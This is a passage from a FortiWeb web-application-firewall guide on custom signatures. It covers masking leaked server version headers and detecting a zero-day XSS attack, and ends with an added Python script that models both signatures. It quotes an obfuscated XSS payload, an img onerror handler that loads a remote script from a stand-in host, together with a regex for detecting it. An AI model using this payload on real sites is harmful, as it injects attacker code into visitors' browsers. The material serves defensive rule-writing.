Fortinet 407 FortiWeb 5.0 Patch 6 Administration Guide
Setting name     Value
Direction        Signature creation
Expression       \bX-Powered-By:(.*)\b
Action           Alert & Erase
Severity         Low
Trigger Action   notification-servers1

The result is that the client receives HTTP responses with headers such as:

Server: XXXXXXXX
X-Powered-By: XXXXXXXX
X-AspNet-Version: XXXXXXXX

To improve performance, Example.com could use the attack logs generated by these signature matches to notify system administrators to disable version headers on their web servers. As each customer's web server is reconfigured properly, this would reduce the memory and processor power required to rewrite its headers.

See also
Defining custom data leak & attack signatures

Example: Zero-day XSS

Example.com is a cloud hosting provider. Large, and with a huge surface area for attacks, it makes a tempting target and continuously sees attackers trying new forms of exploits.

Today, its incident response team discovered a previously unknown XSS attack. The attacker had breached the web applications' own input sanitization defenses and succeeded in embedding 3 new methods of browser attacks in many forum web pages. Example.com wants to write a signature that matches the new browser attacks, regardless of what method is used to inject them.

All of the example text colored magenta contributes to the success of the attacks, and should be matched when creating a signature.

The first new XSS attack found was:

<img
src=/images/nonexistant-file‘
onerror= document.write(
<scr I pt src= www.example.co/xss.js>);
/>

The above attack works by leveraging a client web browser's error handling against itself. Without actually naming JavaScript, the attack uses the JavaScript error-handling event onError() to execute arbitrary code through the HTML <img> tag. The <img> tag's source is a non-existent image. This triggers the web browser to load an arbitrary script from the attacker's
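The two signature cases on this page, the response-direction data-leak signature whose Alert & Erase action produces the XXXXXXXX header values shown above, and a request-direction signature for the obfuscated <img onerror> XSS, modelled in a short Python script. This is an added example, not FortiWeb code or the guide's own: the Signature class, the function names, the Server and X-AspNet-Version expressions, the XSS expression and the sample header lines and request body are my own constructions, written in the style of the guide's \bX-Powered-By:(.*)\b entry. It also shows one thing the settings table alone does not: with the trailing \b, a header value that ends in a non-word character such as ")" keeps that character after erasure, while anchoring the expression on end of line masks the whole value.

```python
import re
from dataclasses import dataclass

ERASE_MASK = "XXXXXXXX"  # what the client sees in place of the leaked value


@dataclass(frozen=True)
class Signature:
    name: str
    direction: str   # "response" for data-leak signatures, "request" for attack signatures
    expression: str  # regular expression, as in the guide's Expression setting
    action: str      # "Alert" or "Alert & Erase"
    severity: str


# Response-direction signatures written in the style of the guide's
# \bX-Powered-By:(.*)\b entry, one per version-leaking header (my additions).
LEAK_SIGNATURES = [
    Signature("server-leak", "response", r"\bServer:(.*)\b", "Alert & Erase", "Low"),
    Signature("x-powered-by-leak", "response", r"\bX-Powered-By:(.*)\b", "Alert & Erase", "Low"),
    Signature("aspnet-version-leak", "response", r"\bX-AspNet-Version:(.*)\b", "Alert & Erase", "Low"),
]

# The same signatures with the trailing \b replaced by $: the value is then
# masked to end of line even when it ends in a non-word character like ")".
TIGHT_LEAK_SIGNATURES = [
    Signature(s.name, s.direction, s.expression[:-2] + "$", s.action, s.severity)
    for s in LEAK_SIGNATURES
]

# Constructed sample of the header lines a leaky backend might send.
SAMPLE_HEADERS = [
    "Server: Apache/2.4.41 (Ubuntu)",
    "X-Powered-By: ASP.NET",
    "X-AspNet-Version: 4.0.30319",
    "Content-Type: text/html",
]


def erase_leaks(header_lines, signatures):
    """Apply response-direction signatures to raw header lines.

    Returns (rewritten_lines, alerts). For "Alert & Erase" the text captured
    by group 1 of the expression (or the whole match if there is no group) is
    replaced by ERASE_MASK, keeping its leading whitespace so the header stays
    well formed. Only what the expression actually matched is masked.
    """
    rewritten, alerts = [], []
    for line in header_lines:
        for sig in (s for s in signatures if s.direction == "response"):
            m = re.search(sig.expression, line)
            if not m:
                continue
            alerts.append((sig.name, sig.severity, line))
            if sig.action == "Alert & Erase":
                start, end = m.span(1) if m.lastindex else m.span()
                value = line[start:end]
                pad = value[: len(value) - len(value.lstrip())]
                line = line[:start] + pad + ERASE_MASK + line[end:]
        rewritten.append(line)
    return rewritten, alerts


# Request-direction attack signature for the zero-day XSS above. The attack
# never spells "script" or "javascript": the tag name arrives as "scr I pt"
# and the code rides on an <img> onerror handler. This expression (my own,
# not the guide's) matches any on* event attribute whose value leads to a
# "<script" tag whose letters may be separated by whitespace, independent of
# how the markup was injected.
XSS_ONERROR_SCRIPT = Signature(
    "zero-day-xss-1", "request",
    r"\bon\w+\s*=[^>]*<\s*s\s*c\s*r\s*i\s*p\s*t\b", "Alert", "High",
)

# The guide's first attack, reproduced as the request body under test.
XSS_SAMPLE = (
    "<img\n"
    "src=/images/nonexistant-file\u2018\n"
    "onerror= document.write(\n"
    "<scr I pt src= www.example.co/xss.js>);\n"
    "/>"
)
# Constructed benign markup: the split word appears, but in no event handler.
BENIGN_SAMPLE = '<img src=/images/logo.png alt="scr I pt">'


def match_attack(body, signature=XSS_ONERROR_SCRIPT):
    """Return the text matched by a request-direction signature, or None."""
    m = re.search(signature.expression, body, re.IGNORECASE)
    return m.group(0) if m else None


if __name__ == "__main__":
    lines, alerts = erase_leaks(SAMPLE_HEADERS, LEAK_SIGNATURES)
    print("\n".join(lines), "\nalerts:", len(alerts))
    print("\n".join(erase_leaks(SAMPLE_HEADERS, TIGHT_LEAK_SIGNATURES)[0]))
    print(repr(match_attack(XSS_SAMPLE)), match_attack(BENIGN_SAMPLE))
```

The XSS expression fires on any attribute whose name begins with "on", so it should be tried against the site's own pages and forms before the action is raised from Alert to a blocking one; the alert logs it generates are the same ones the text above suggests using to chase down the leaking backends.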